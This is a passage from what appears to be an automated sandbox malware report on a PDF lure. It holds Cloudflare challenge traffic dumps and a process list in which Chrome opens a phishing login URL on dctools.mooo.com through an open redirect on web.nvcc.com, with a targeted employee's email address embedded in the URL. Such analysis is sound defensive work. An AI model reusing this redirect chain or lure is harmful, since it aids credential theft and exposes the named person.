                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20g_g9lmFpAh8qG0nOiv2bOxRaE-F4ylgwX0OHcluyqkxsAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                              2024-10-03 01:16:06 UTC1INData Raw: 4a
                                                                              Data Ascii: J


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              38192.168.2.449804104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:16:07 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8cc915a7fc91c407/1727918165138/3p8fPrR4fQOFciC HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: no-cors
                                                                              Sec-Fetch-Dest: image
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:16:07 UTC170INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:16:07 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc915c1cd357cf6-EWR
                                                                              2024-10-03 01:16:07 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 45 08 02 00 00 00 f5 b5 40 29 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRE@)IDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              39192.168.2.449805104.18.95.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:16:08 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8cc915a7fc91c407/1727918165138/3p8fPrR4fQOFciC HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:16:09 UTC170INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:16:08 GMT
                                                                              Content-Type: image/png
                                                                              Content-Length: 61
                                                                              Connection: close
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc915cbffb94352-EWR
                                                                              2024-10-03 01:16:09 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 0e 00 00 00 45 08 02 00 00 00 f5 b5 40 29 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                              Data Ascii: PNGIHDRE@)IDAT$IENDB`


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              40192.168.2.449806104.18.94.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:16:09 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/222733666:1727915423:5-v15oC4VIYDeSwiN5Q89PsCmAt4Sv9Px2N-w3JWz38/8cc915a7fc91c407/a2be53c464a6597 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              Content-Length: 31745
                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                              Content-type: application/x-www-form-urlencoded
                                                                              sec-ch-ua-mobile: ?0
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              CF-Challenge: a2be53c464a6597
                                                                              sec-ch-ua-platform: "Windows"
                                                                              Accept: */*
                                                                              Origin: https://challenges.cloudflare.com
                                                                              Sec-Fetch-Site: same-origin
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/ij3yy/0x4AAAAAAAkT9bhPl3xAq3UV/auto/fbE/normal/auto/
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:16:09 UTC16384OUTData Raw: 76 5f 38 63 63 39 31 35 61 37 66 63 39 31 63 34 30 37 3d 45 46 65 43 48 24 6e 79 51 37 51 68 44 54 34 39 66 39 6c 37 65 68 74 6e 4f 39 6a 43 44 67 47 4d 36 71 6e 35 68 39 66 62 36 79 39 5a 68 39 6e 62 24 55 71 39 61 39 6d 4d 78 64 4a 4d 39 4e 67 39 49 4d 24 74 39 4e 73 62 39 63 6b 39 25 32 62 70 39 57 57 6d 35 44 39 37 75 65 39 4f 24 39 69 6f 51 64 39 2b 62 6e 74 39 65 4d 68 31 35 7a 36 78 2b 39 36 42 43 78 4b 6b 39 36 67 41 48 65 58 38 48 43 24 4f 39 68 34 51 6e 48 53 78 78 24 63 51 39 77 6d 39 46 37 4d 39 41 39 54 69 39 78 7a 34 64 49 73 24 4d 58 4d 39 52 6e 36 6b 45 37 30 31 46 73 65 39 30 37 4f 79 62 57 4d 31 64 67 62 67 7a 6c 68 47 42 6c 67 51 39 4d 6f 24 57 6a 62 6e 64 39 68 69 36 7a 31 71 24 38 31 37 76 74 39 6e 45 24 74 58 57 53 4c 77 63 61 4c 37
                                                                              Data Ascii: v_8cc915a7fc91c407=EFeCH$nyQ7QhDT49f9l7ehtnO9jCDgGM6qn5h9fb6y9Zh9nb$Uq9a9mMxdJM9Ng9IM$t9Nsb9ck9%2bp9WWm5D97ue9O$9ioQd9+bnt9eMh15z6x+96BCxKk96gAHeX8HC$O9h4QnHSxx$cQ9wm9F7M9A9Ti9xz4dIs$MXM9Rn6kE701Fse907OybWM1dgbgzlhGBlgQ9Mo$Wjbnd9hi6z1q$817vt9nE$tXWSLwcaL7
                                                                              2024-10-03 01:16:09 UTC15361OUTData Raw: 6e 4f 39 6d 43 77 64 37 51 31 71 6e 42 59 77 56 67 51 54 62 24 39 54 43 68 65 6e 56 62 67 39 24 62 39 32 62 72 39 6e 24 39 34 39 42 57 36 62 39 62 43 30 39 39 62 39 79 62 69 79 68 39 39 6f 43 68 39 2b 46 6e 4c 4e 4d 4d 6e 2b 6e 41 39 2b 39 36 71 6e 68 51 68 39 2b 34 39 6a 39 65 62 6e 39 39 4b 39 72 4d 2b 69 39 51 39 54 69 2b 4c 39 77 39 6c 62 24 43 6e 54 39 6e 48 75 4a 39 57 39 6a 74 24 49 6e 78 62 2b 39 6e 74 70 6f 5a 4d 4a 31 4d 39 46 39 68 39 24 2b 39 79 56 6e 43 53 76 79 48 5a 77 69 24 6a 51 54 2b 36 70 24 42 39 6c 39 41 69 78 44 39 53 39 76 73 61 62 24 77 5a 50 78 6f 5a 70 30 39 49 4e 63 71 47 42 4b 42 72 63 48 51 59 72 37 71 68 46 33 6b 43 39 79 48 64 34 71 5a 69 45 24 71 62 76 62 72 48 4a 49 71 70 48 6c 77 78 62 68 62 32 45 4f 54 67 64 7a 39 72 67
                                                                              Data Ascii: nO9mCwd7Q1qnBYwVgQTb$9TChenVbg9$b92br9n$949BW6b9bC099b9ybiyh99oCh9+FnLNMMn+nA9+96qnhQh9+49j9ebn99K9rM+i9Q9Ti+L9w9lb$CnT9nHuJ9W9jt$Inxb+9ntpoZMJ1M9F9h9$+9yVnCSvyHZwi$jQT+6p$B9l9AixD9S9vsab$wZPxoZp09INcqGBKBrcHQYr7qhF3kC9yHd4qZiE$qbvbrHJIqpHlwxbhb2EOTgdz9rg
                                                                              2024-10-03 01:16:09 UTC300INHTTP/1.1 200 OK
                                                                              Date: Thu, 03 Oct 2024 01:16:09 GMT
                                                                              Content-Type: text/plain; charset=UTF-8
                                                                              Content-Length: 26872
                                                                              Connection: close
                                                                              cf-chl-gen: TL+8R1L3805BASfjpdKzh6WfHfBc3yE8H80UpbNskmqQg8esx8NuQRHFdpOohcqxvD2vQaW4EUwWmyFB$7uTxTM76bKcD7rVg
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc915cebb48726e-EWR
                                                                              2024-10-03 01:16:09 UTC1069INData Raw: 67 36 32 4c 68 34 79 49 6c 4c 53 55 73 34 79 2b 6b 73 65 67 78 38 53 55 6a 4a 36 5a 71 4a 6d 69 6e 61 79 30 76 62 43 77 79 73 57 71 79 73 54 59 73 74 66 51 6c 39 69 30 6f 63 4c 61 33 72 37 46 31 39 6d 31 77 63 37 6a 34 39 7a 4f 72 4f 2f 6d 33 73 54 4a 37 63 6d 34 7a 4c 72 56 38 66 76 4a 31 39 2f 64 37 62 33 58 2b 38 66 6c 32 41 54 34 35 64 37 34 2b 74 34 4f 45 51 6b 56 44 78 6b 59 34 68 58 32 46 4f 37 79 46 51 41 55 48 64 62 6b 35 69 49 52 39 76 49 66 48 41 6f 59 44 75 67 6c 48 76 77 4b 4b 50 59 74 42 43 62 30 4a 78 51 75 42 7a 73 75 4b 2f 6b 45 4f 6a 63 43 51 30 6a 37 43 6a 6b 57 4c 6a 6c 4f 4d 69 45 38 51 55 52 4a 4e 6b 4e 4a 4b 79 63 58 54 68 78 41 50 56 67 37 50 31 64 51 51 6b 4e 49 58 44 39 47 4f 6b 35 44 62 30 64 43 4b 7a 42 73 64 45 64 76 52 53 38
                                                                              Data Ascii: g62Lh4yIlLSUs4y+ksegx8SUjJ6ZqJminay0vbCwysWqysTYstfQl9i0ocLa3r7F19m1wc7j49zOrO/m3sTJ7cm4zLrV8fvJ19/d7b3X+8fl2AT45d74+t4OEQkVDxkY4hX2FO7yFQAUHdbk5iIR9vIfHAoYDuglHvwKKPYtBCb0JxQuBzsuK/kEOjcCQ0j7CjkWLjlOMiE8QURJNkNJKycXThxAPVg7P1dQQkNIXD9GOk5Db0dCKzBsdEdvRS8
                                                                              2024-10-03 01:16:09 UTC1369INData Raw: 4b 72 50 32 72 76 4c 7a 37 72 6e 73 35 72 42 32 37 53 34 78 73 76 6a 77 4e 2f 77 38 2b 76 78 39 73 50 70 35 64 62 35 31 2b 62 37 2b 75 33 61 38 4e 76 53 32 51 55 46 77 64 67 43 33 4e 37 61 2f 63 37 35 33 77 66 37 35 64 34 46 46 75 51 53 38 2b 58 63 47 77 6e 78 33 78 33 67 46 43 51 68 35 50 4c 33 4a 52 38 68 42 78 37 39 36 7a 41 62 45 76 50 79 49 69 63 59 37 68 4d 49 4f 51 6e 36 39 67 67 54 2b 69 39 46 2b 77 58 34 2f 68 4e 42 46 55 68 44 4f 54 64 49 47 78 4a 47 49 54 51 7a 4e 54 46 57 4f 78 49 5a 4c 55 5a 52 49 46 63 2f 51 56 74 58 52 6b 55 6b 53 6b 56 49 53 57 5a 4b 4f 56 78 46 53 32 55 38 63 6b 6f 75 52 44 46 50 53 57 70 62 53 33 56 30 50 59 4e 5a 63 47 42 2f 52 6c 35 7a 52 6e 61 4d 62 6f 70 4e 52 6d 46 62 62 6d 35 52 5a 56 46 76 63 48 69 5a 63 47 35 55
                                                                              Data Ascii: KrP2rvLz7rns5rB27S4xsvjwN/w8+vx9sPp5db51+b7+u3a8NvS2QUFwdgC3N7a/c753wf75d4FFuQS8+XcGwnx3x3gFCQh5PL3JR8hBx796zAbEvPyIicY7hMIOQn69ggT+i9F+wX4/hNBFUhDOTdIGxJGITQzNTFWOxIZLUZRIFc/QVtXRkUkSkVISWZKOVxFS2U8ckouRDFPSWpbS3V0PYNZcGB/Rl5zRnaMbopNRmFbbm5RZVFvcHiZcG5U
                                                                              2024-10-03 01:16:09 UTC1369INData Raw: 71 2b 74 38 61 6e 70 74 6a 42 77 73 66 74 76 72 37 4d 71 39 44 52 73 72 50 43 7a 64 48 32 31 4e 58 32 37 37 6a 54 31 2b 79 2f 39 4e 62 52 30 66 59 43 43 41 72 45 34 52 44 36 34 2b 58 68 42 77 33 56 39 51 6a 5a 42 52 30 51 32 42 6e 76 38 64 63 50 38 77 62 35 34 76 58 38 42 76 49 63 48 67 33 67 4b 79 73 51 41 42 38 6b 41 54 67 67 4f 68 59 6b 43 66 6b 47 48 42 45 57 49 6a 59 52 4f 79 63 56 47 68 6b 70 4b 53 6b 39 4c 52 77 6c 55 54 73 7a 54 30 6f 66 4e 51 35 4e 47 52 45 6e 4e 78 35 58 4d 7a 51 72 59 45 4a 65 52 47 41 2b 5a 79 42 57 4b 6c 77 72 50 7a 31 6b 54 47 5a 56 4c 6a 56 72 63 32 4a 58 62 30 35 4a 54 6a 5a 70 63 6a 35 58 58 7a 73 38 4f 56 42 79 53 6d 68 33 64 59 74 6e 54 49 52 72 66 48 42 2f 59 57 42 6b 6a 48 4a 55 64 6d 5a 6f 64 70 79 4f 6a 6d 43 45 6c
                                                                              Data Ascii: q+t8anptjBwsftvr7Mq9DRsrPCzdH21NX277jT1+y/9NbR0fYCCArE4RD64+XhBw3V9QjZBR0Q2Bnv8dcP8wb54vX8BvIcHg3gKysQAB8kATggOhYkCfkGHBEWIjYROycVGhkpKSk9LRwlUTszT0ofNQ5NGREnNx5XMzQrYEJeRGA+ZyBWKlwrPz1kTGZVLjVrc2JXb05JTjZpcj5XXzs8OVBySmh3dYtnTIRrfHB/YWBkjHJUdmZodpyOjmCEl
                                                                              2024-10-03 01:16:09 UTC1369INData Raw: 2b 70 37 6e 4f 79 65 71 2b 30 63 66 4a 73 4d 62 68 30 4d 66 78 36 4b 2f 50 74 63 33 69 7a 74 75 37 76 51 44 6d 2f 65 50 2b 38 2f 7a 36 2f 4f 6a 6c 2f 64 76 37 35 74 48 2b 43 67 51 51 44 39 76 58 37 4e 73 57 2f 4f 33 79 2f 66 7a 66 38 69 62 77 34 76 49 70 4b 69 38 63 4d 52 2f 71 2b 69 51 53 49 41 67 6a 4d 77 73 4f 4e 43 77 64 4e 7a 34 58 44 7a 77 74 4a 6b 51 69 41 78 59 68 47 51 67 47 53 55 51 5a 45 41 73 6b 50 6a 42 48 4b 43 5a 4a 47 6c 41 6d 47 56 64 5a 47 31 30 61 51 56 31 6a 4d 43 63 69 58 79 68 6d 59 43 70 6b 4b 55 4a 50 58 45 31 56 61 32 41 78 64 55 31 48 65 6a 70 46 63 30 78 5a 65 55 78 4c 54 48 46 6e 64 49 42 35 61 45 5a 65 57 59 57 47 68 6f 75 54 52 57 57 48 6c 6d 71 50 62 5a 52 62 55 35 56 6d 67 47 39 62 63 61 4f 5a 57 33 4f 6b 65 5a 68 6a 64 71
                                                                              Data Ascii: +p7nOyeq+0cfJsMbh0Mfx6K/Ptc3iztu7vQDm/eP+8/z6/Ojl/dv75tH+CgQQD9vX7NsW/O3y/fzf8ibw4vIpKi8cMR/q+iQSIAgjMwsONCwdNz4XDzwtJkQiAxYhGQgGSUQZEAskPjBHKCZJGlAmGVdZG10aQV1jMCciXyhmYCpkKUJPXE1Va2AxdU1HejpFc0xZeUxLTHFndIB5aEZeWYWGhouTRWWHlmqPbZRbU5VmgG9bcaOZW3OkeZhjdq
                                                                              2024-10-03 01:16:09 UTC1369INData Raw: 71 75 2f 73 74 50 66 7a 39 75 54 33 2b 62 66 47 39 4c 72 41 2b 76 44 6b 39 67 44 5a 32 75 6e 53 32 39 33 31 41 51 62 69 38 73 76 4f 41 41 44 70 31 68 4d 52 36 74 6a 33 45 78 62 7a 38 50 58 39 42 52 51 68 47 68 55 44 47 76 67 42 42 77 34 6a 43 51 6b 4b 4d 78 58 38 43 68 55 58 42 66 51 49 42 41 37 39 4c 41 38 74 51 77 49 57 4e 78 51 50 52 30 55 32 4e 79 30 34 51 42 68 43 45 44 38 72 44 7a 55 56 56 45 46 46 4c 78 46 54 46 7a 34 35 58 30 39 62 4d 6a 49 39 55 6b 56 42 4f 31 68 46 4e 45 35 4d 5a 56 74 77 59 45 39 30 51 6b 4e 73 52 57 4e 69 61 32 63 37 62 30 6c 57 50 34 42 73 68 49 53 44 58 48 49 37 5a 47 68 66 58 6e 32 4d 67 34 4a 75 59 48 57 4d 68 6c 42 34 69 33 47 48 56 6c 71 52 62 6c 4a 62 65 31 35 68 6c 5a 32 67 6e 58 6c 69 6d 49 43 4f 65 59 2b 6c 61 34 47
                                                                              Data Ascii: qu/stPfz9uT3+bfG9LrA+vDk9gDZ2unS2931AQbi8svOAADp1hMR6tj3Exbz8PX9BRQhGhUDGvgBBw4jCQkKMxX8ChUXBfQIBA79LA8tQwIWNxQPR0U2Ny04QBhCED8rDzUVVEFFLxFTFz45X09bMjI9UkVBO1hFNE5MZVtwYE90QkNsRWNia2c7b0lWP4BshISDXHI7ZGhfXn2Mg4JuYHWMhlB4i3GHVlqRblJbe15hlZ2gnXlimICOeY+la4G
                                                                              2024-10-03 01:16:09 UTC1369INData Raw: 72 62 56 36 39 4c 6e 33 4e 43 33 30 39 73 44 41 2b 54 42 76 2b 54 32 31 41 6a 6c 36 67 63 46 2f 76 44 51 34 2b 6b 59 38 4f 45 4e 38 2f 6b 54 2f 4f 6e 36 2b 41 45 45 38 77 48 6a 42 2f 4c 2b 49 42 4d 6c 4b 2f 66 6b 45 50 72 6e 41 7a 51 52 4c 42 49 57 38 42 51 53 50 42 6b 53 45 76 67 50 41 68 41 62 4d 7a 73 43 4d 78 49 32 54 43 6b 49 50 42 34 6d 49 54 38 79 4a 69 52 47 4e 30 63 6e 4d 78 55 36 4a 55 67 61 54 79 46 4d 57 56 41 32 56 6a 49 6c 4e 45 4e 66 4c 44 78 5a 54 7a 6c 79 59 6b 49 73 64 57 55 79 62 45 6c 52 62 33 74 4c 61 48 46 33 66 31 73 39 59 59 4e 7a 51 49 59 37 64 47 61 48 57 32 4a 61 5a 4a 4a 6c 62 6d 6c 6c 61 6f 68 35 59 59 53 4e 68 32 70 33 6c 47 6c 70 64 6d 35 34 70 6e 6d 43 66 58 68 2f 69 61 78 34 6d 4b 53 46 71 36 4a 2f 6c 62 57 4d 67 71 61 32
                                                                              Data Ascii: rbV69Ln3NC309sDA+TBv+T21Ajl6gcF/vDQ4+kY8OEN8/kT/On6+AEE8wHjB/L+IBMlK/fkEPrnAzQRLBIW8BQSPBkSEvgPAhAbMzsCMxI2TCkIPB4mIT8yJiRGN0cnMxU6JUgaTyFMWVA2VjIlNENfLDxZTzlyYkIsdWUybElRb3tLaHF3f1s9YYNzQIY7dGaHW2JaZJJlbmllaoh5YYSNh2p3lGlpdm54pnmCfXh/iax4mKSFq6J/lbWMgqa2
                                                                              2024-10-03 01:16:09 UTC1369INData Raw: 44 55 33 76 6d 2b 32 64 44 47 77 74 37 37 31 77 72 68 32 4d 66 69 35 42 54 6e 45 65 6f 49 41 68 6a 73 44 41 62 57 38 50 6f 57 47 2f 55 55 39 79 44 35 38 4e 34 71 2f 51 62 37 35 51 67 66 4c 75 6b 47 44 65 34 30 43 67 48 75 4d 77 30 46 2b 77 38 52 47 67 67 37 46 6a 50 36 2f 52 6c 48 41 77 49 64 50 55 4a 49 49 55 38 4c 55 69 64 55 4e 46 55 70 52 78 67 72 4c 69 55 58 58 44 45 70 58 6d 49 31 4c 6a 41 65 51 46 63 6e 61 54 30 32 4e 43 5a 44 58 79 38 72 52 32 52 42 52 30 6c 34 59 6e 4e 4f 65 7a 64 38 55 32 38 33 4f 6c 64 31 65 6e 39 5a 69 46 43 44 58 58 78 59 52 6d 46 5a 53 34 39 73 67 35 4b 54 61 5a 68 6f 55 6d 2b 4d 66 4a 70 78 6a 31 68 7a 64 58 32 69 70 58 75 58 70 71 4e 39 64 6f 42 6d 67 61 47 6d 72 49 65 6a 61 37 61 4a 6b 71 4b 31 6a 71 74 33 75 70 69 77 6b
                                                                              Data Ascii: DU3vm+2dDGwt771wrh2Mfi5BTnEeoIAhjsDAbW8PoWG/UU9yD58N4q/Qb75QgfLukGDe40CgHuMw0F+w8RGgg7FjP6/RlHAwIdPUJIIU8LUidUNFUpRxgrLiUXXDEpXmI1LjAeQFcnaT02NCZDXy8rR2RBR0l4YnNOezd8U283Old1en9ZiFCDXXxYRmFZS49sg5KTaZhoUm+MfJpxj1hzdX2ipXuXpqN9doBmgaGmrIeja7aJkqK1jqt3upiwk
                                                                              2024-10-03 01:16:09 UTC1369INData Raw: 59 32 2b 6a 42 33 77 6a 67 32 67 66 48 37 75 37 30 41 75 37 78 33 78 6e 76 35 51 72 57 39 2b 6a 57 49 50 63 55 47 69 58 2b 33 51 51 6d 2f 65 49 6d 36 67 30 77 44 76 67 69 45 54 4d 44 46 6a 67 79 4e 51 38 5a 45 50 6b 70 43 7a 41 54 4d 50 30 30 44 6a 41 39 4b 41 45 71 41 69 67 4c 49 56 41 5a 49 44 30 79 48 51 73 2f 49 68 52 49 4d 42 4d 55 4f 6a 46 53 57 7a 4e 44 56 46 39 51 51 30 45 6f 55 6b 52 66 56 69 74 4e 54 45 78 72 55 43 70 72 5a 30 77 76 4d 46 5a 4e 57 48 64 50 58 31 70 37 62 46 39 65 56 57 35 67 65 33 35 48 61 57 68 6f 6a 6d 78 47 68 34 70 6f 53 30 78 79 61 6d 53 54 61 34 4a 6d 6c 34 68 37 65 6d 32 4b 64 34 4e 75 64 6f 39 7a 69 5a 65 41 71 32 64 6c 67 6e 71 41 62 4a 4a 2b 6b 61 4f 50 6b 35 57 49 70 5a 71 46 63 36 65 4b 66 4c 69 59 66 49 78 39 74 59
                                                                              Data Ascii: Y2+jB3wjg2gfH7u70Au7x3xnv5QrW9+jWIPcUGiX+3QQm/eIm6g0wDvgiETMDFjgyNQ8ZEPkpCzATMP00DjA9KAEqAigLIVAZID0yHQs/IhRIMBMUOjFSWzNDVF9QQ0EoUkRfVitNTExrUCprZ0wvMFZNWHdPX1p7bF9eVW5ge35HaWhojmxGh4poS0xyamSTa4Jml4h7em2Kd4Nudo9ziZeAq2dlgnqAbJJ+kaOPk5WIpZqFc6eKfLiYfIx9tY


                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                              41192.168.2.449807104.18.95.414438044C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              TimestampBytes transferredDirectionData
                                                                              2024-10-03 01:16:10 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/222733666:1727915423:5-v15oC4VIYDeSwiN5Q89PsCmAt4Sv9Px2N-w3JWz38/8cc915a7fc91c407/a2be53c464a6597 HTTP/1.1
                                                                              Host: challenges.cloudflare.com
                                                                              Connection: keep-alive
                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                              Accept: */*
                                                                              Sec-Fetch-Site: none
                                                                              Sec-Fetch-Mode: cors
                                                                              Sec-Fetch-Dest: empty
                                                                              Accept-Encoding: gzip, deflate, br
                                                                              Accept-Language: en-US,en;q=0.9
                                                                              2024-10-03 01:16:10 UTC349INHTTP/1.1 404 Not Found
                                                                              Date: Thu, 03 Oct 2024 01:16:10 GMT
                                                                              Content-Type: application/json
                                                                              Content-Length: 7
                                                                              Connection: close
                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                              cf-chl-out: bl0ka6NQ98LE8F5FmYWJ53MN3J4r/cYvXZ4=$klnpSkbsmJFgeRdf
                                                                              Server: cloudflare
                                                                              CF-RAY: 8cc915d50fcc426b-EWR
                                                                              2024-10-03 01:16:10 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                              Data Ascii: invalid


                                                                              Click to jump to process

                                                                              Click to jump to process

                                                                              Click to dive into process behavior distribution

                                                                              Click to jump to process

                                                                              Target ID:0
                                                                              Start time:21:13:24
                                                                              Start date:02/10/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Desktop\Globalfoundries.com_Report_46279.pdf"
                                                                              Imagebase:0x7ff6bc1b0000
                                                                              File size:5'641'176 bytes
                                                                              MD5 hash:24EAD1C46A47022347DC0F05F6EFBB8C
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:1
                                                                              Start time:21:13:24
                                                                              Start date:02/10/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --backgroundcolor=16777215
                                                                              Imagebase:0x7ff74bb60000
                                                                              File size:3'581'912 bytes
                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:3
                                                                              Start time:21:13:25
                                                                              Start date:02/10/2024
                                                                              Path:C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\AcroCEF.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --log-severity=disable --user-agent-product="ReaderServices/23.6.20320 Chrome/105.0.0.0" --lang=en-US --user-data-dir="C:\Users\user\AppData\Local\CEF\User Data" --log-file="C:\Program Files\Adobe\Acrobat DC\Acrobat\acrocef_1\debug.log" --mojo-platform-channel-handle=2112 --field-trial-handle=1736,i,15902866623834626839,14244420450878097098,131072 --disable-features=BackForwardCache,CalculateNativeWinOcclusion,WinUseBrowserSpellChecker /prefetch:8
                                                                              Imagebase:0x7ff74bb60000
                                                                              File size:3'581'912 bytes
                                                                              MD5 hash:9B38E8E8B6DD9622D24B53E095C5D9BE
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:true

                                                                              Target ID:9
                                                                              Start time:21:13:49
                                                                              Start date:02/10/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized "https://web.nvcc.com/cwt/external/wcpages/referral.aspx?ReferralType=W&ProfileID=6987&ListingID=7469&CategoryID=637&SubCategoryID=0&url=//dctools.mooo.com/smileyes/login/qwerty/lance.koyanagi@globalfoundries.com
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              Target ID:10
                                                                              Start time:21:13:50
                                                                              Start date:02/10/2024
                                                                              Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              Wow64 process (32bit):false
                                                                              Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2068 --field-trial-handle=1996,i,15611262537185855656,1255272024732511954,262144 /prefetch:8
                                                                              Imagebase:0x7ff76e190000
                                                                              File size:3'242'272 bytes
                                                                              MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                                              Has elevated privileges:true
                                                                              Has administrator privileges:true
                                                                              Programmed in:C, C++ or other language
                                                                              Reputation:high
                                                                              Has exited:false

                                                                              No disassembly